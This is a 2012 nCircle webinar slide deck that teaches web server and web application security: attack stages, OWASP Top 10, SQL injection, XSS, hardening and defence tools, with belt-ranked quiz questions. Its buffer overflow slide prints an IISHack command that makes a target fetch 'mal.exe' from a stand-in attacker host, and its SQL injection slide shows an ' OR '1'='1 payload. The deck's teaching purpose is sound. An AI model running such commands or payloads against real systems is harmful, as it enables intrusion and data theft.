nCircle Webinar: Get your Black Belt

© 2012 nCircle. All rights reserved.

Get Your Black Belt in Web Application Security26 April 2012

2 © 2012 nCircle. All rights reserved.

Web Server and Web Applications Security


Why Web Servers and Web Applications are hard to Defend

Why is attacking a web server or web applications one of the easiest attack methods?

– On the perimeter– Accessible by anyone on the Internet– Need to balance functionality with security– Port 80 and port 443 (can’t just block them)– Lack of security awareness of many

web developers– High level of traffic. Hard to distinguish an

attack from high volumes of legitimate traffic


Typical Attack Steps against a Web Server

1. Reconnaissance (passive)

2. Scanning and enumeration (active)

3. Gaining Access (exploit)

4. Escalation of privilege

5. Maintain access

6. Covering tracks and placing backdoors


Two Methods of Attack: The Web Server and Web Applications

• Web Server Attacks– Vulnerabilities in the web server or web server

configuration• Examples: Buffer Overflows, Traversals

• Web Application Attacks– Vulnerabilities in web applications

• Command Injection• XSS (Cross Site Scripting)


Ichi (one)

With respect to defending against web attacks what is problem with port 80 with respect to security?

a. It is the default TFTP port

b. It can be closed

c. It is not a well-known port

d. It can’t be blocked

Difficulty: Easy/Medium


Ni (two)

For an attack to work on a web server or a web application what does it need to have?

a. An exploit

b. A risk

c. A vulnerability

d. A configuration



Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.


Web Server Attacks


Buffer Overflow Attack

A buffer overflow attack allows an attacker to overwrite code in the program’s execution path and thus take control of the program to execute the attacker’s code.

Cause: Poor boundary checking (checking whether a variable is within some bounds before its use)

Example:

IISHack.exe Exploits the IIS http daemon buffer. Below is a sample:

c:\ iishack www.WebserverA.com 80www.hackserver.com/mal.exe


Web Server File System Traversal Attacks

• Clients are permitted access to only a specific partition of the server file system, known as the web document root directory.

• By modifying a website URL, a hacker can perform a file system traversal and obtain access to files on other parts of the server.

• Attack is initiated by inserting special characters in URLs, for example, ../ sequence.

• Encoding can be used to bypass Web server filtering.


San (three)

Which one of the following is NOT one of the typical attacks used against a web server like Apache?

a. ARP poisoning

b. Buffer overflow

c. Source disclosure

d. File system traversal



Shi (four)

A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?

a. Buffer boundary

b. File system traversal

c. Encryption

d. File overflow



Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.


Web Application Attacks


OWASP Top 10 Categories

A1-Injection

A2-Cross Site Scripting (XSS)

A3-Broken Authentication/Session Management

A4-Insecure Direct Object References

A5-Cross Site Request Forgery (CSRF)

A6-Security Misconfiguration

A7-Insecure Cryptographic Storage

A8-Failure to Restrict URL Access

A9-Insufficient Transport Layer Encryption

A10-Unvalidated Redirects and Forwards

OWASP Top 10 (2010 List) – www.owasp.org


Injection (Command Injection – OWASP A1)

• Occurs when untrusted data is sent to a command interpreter as part of a command or query.

• Cleverly formed data can trick the command interpreter to performing unintended commands or revealing unintended information

• Examples of command injection:– SQL Injection– Script Injection– Any web application that accepts input is potentially vulnerable

to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program


SQL Injection (Valid Data)

As an example the user enters Jill and Brown into two input fields on a web page

The program takes this input into the CustID variable and dynamically creates the query string :

‘SELECT * FROM accounts WHERE customerID =Jill_Brown’

The program then sends this SQL query to the SQL database and the SQL database then retrieves and displays Jill Brown’s record as expected.


SQL Injection (Invalid Data)

The user enters Jane and Doe’ OR ‘1’=‘1 on the web page

The program takes this input and dynamically creates the query string :

‘SELECT * FROM accounts WHERE customerID =Jane_Doe’ OR ‘1’=‘1’

The program send this SQL query to the SQL database and it then retrieves ALL of the records in the database accounts table – NOT as expected


Defenses Against SQL Injection

• Prepared Statements (parameterized queries)• Stored Procedures• Escaping all user supplied input• Least privilege• White list input validation

Reference: OWASP SQL Injection Prevention Cheat

Sheet (www.owasp.org)


Cross Site Scripting (XSS – OWASP A2)

Untrusted data

• Cross-Site Scripting attacks are a type of injection attack, in which malicious scripts are injected into the otherwise benign and trusted web sites. Injection occurs usually by inserting untrusted data in a user’s browser via a web page request.


Defenses Against XSS

Primary defense: Escaping untrusted data

“Escaping” is a technique used to ensure that characters are treated as data, not as characters that are relevant to the interpreter's parser.

Rule #0 : Never put untrusted data (in a web page) Except in Allowed Locations

Rule #1 : HTML Escape Before Inserting Untrusted Data Except into HTML Element Content

Rules #2 - #7 : These rules deal with exceptions if you put untrusted data in “Unallowed” locations

Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)


Broken Authentication and Session Management(OWASP A3)

• Web Application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session ids) are poorly implemented allowing an attacker to assume someone else's identity.


Defenses Against Broken Authentication and Session Management

• Secure management of session identifiers– Do not put session identifiers in the URL– Session IDs should have a timeout feature

• Do not allow the login process to execute from an unencrypted page

• Password Change Controls• Password use / strength / storage

• Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)


Go (five)

An web application attack that focuses on the database application of a web server and enables a hacker to acquire sensitive information stored in the database is which one of the following?

a. Sequence infiltration

b. SQL injection

c. Cookie poisoning

d. Hidden parameter exploit



Roku (six)

What is one of the defenses against SQL Injection?

a. Least Privilege

b. Black list input validation

c. Sanitization

d. Proxy manipulation



Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.


Web Server and Web ApplicationDefense Tools


Web Server and Application Defense Tools (1 of 2)

• Scanning and mapping tools• Ping, Nping, Nmap, Amap, SuperScan, …

• Vulnerability and Web vulnerability scanners• Nikto, Wikto, Nessus, w3af, IP360, WebInspect,

Sentinel, WebApp360, Cenzic, Fortify, …

• Web proxy tools• WebScarab, Paros Proxy, Burp Proxy, …

• Web mapping/ripping tools• Black Widow, Wget, skipfish, …

• Communication/data transfer tools• Ncat, telnet, ftp, ….

• Exploits, Exploit Kits, and Exploit Frameworks• Program for a specific exploit• Pen Test frameworks: Metasploit, Core Impact, CANVAS


• Password cracking tools• John the Ripper, Cain and Abel, PRTK, ophcrack, …

• Web Source Code examination tools:• Instant Source, Firebug, ….

• SQL Injection Tools• BSQL Hacker, The Mole, sqlmap,

Pangolin, …

Web Server and Application Defense Tools (2 of 2)


Network Defense Tools (Protecting the Web Server)

• Routers• Firewalls (network layer)• Web Application Firewalls (application layer)• Web Application Proxies• Honeypots/Honeynets• Logging• Intrusion Detection/Prevention System (IDS/IPS)• Host-based Intrusion Detection (HIDS), e.g. file integrity

detection• Backups• Computer Forensic Tools


Web Server Protection

• Protect the Web Server • Vulnerability Assessment • Harden the Web Server

– Host (OS) – Web Server – Web Services

• Logging • Backups and recovery


Place the Web Sever in an Untrusted Zone


Security Harden the Web Server (1 of 2)

• Use Security Hardening Guides (Vendor documentation, OWASP, SANS, NIST, WASC)

• Host (OS) hardening

• Web Server hardening– Use tools like IIS Lockdown and URLscan– Harden each service you offer on your Web Server– Disable / remove anything you don’t use or need: accounts,

ports, services, accounts, plug-ins– Configuration settings– Permissions


Security Harden the Web Server (2 of 2)

• Authentication and Access Control – File and directory permissions– Account password and lockout policies

• Logging and Audit Policies

• Vulnerability and Compliance Assessments– Vulnerability scanner– Web application vulnerability scanner– Configuration scanner– Audits for compliance assessments – Penetration testing / manual testing


Web Server Attack Countermeasures

• Buffer Overflow– Can be mitigated by conducting frequent scans for server

vulnerabilities

– Prompting acquiring and installing patches and service packs

– Implementing effective firewalls

– Applying web configuration lockdown utilities

• File System Traversal– Promptly apply patches and updates to the web server

– Restrict privileges to executable programs such as cmd.exe

– Set file and directory permissions

– Locate the system software on a different disk drive from the web site software and content directory.


Shichi (seven)

Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?

a. Banner grabbing

b. Defeating authentication

c. Scanning

d. Password Cracking

Difficulty: Medium/Hard


Hachi (eight)

What is a good tool to help harden an IIS web server? (choose the best answer)

a. Cain and Abel

b. URLscan

c. ncat

d. WebScarab

Difficulty: Medium/Hard


Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan


Resources

• OWASP (Open Web Application Security Project) www.owasp.org

• NIST (National Institute of Standards and Technology) www.nist.gov

• SANS

www.sans.org • Web Application Security Consortium (WASC)

www.webappsec.org • SecTools.org

http://sectools.org

http://www.owasp.org/

http://www.nist.gov/

http://www.sans.org/

http://www.webappsec.org/

http://sectools.org/


Questions?

Business

nCircle Webinar: Get your Black Belt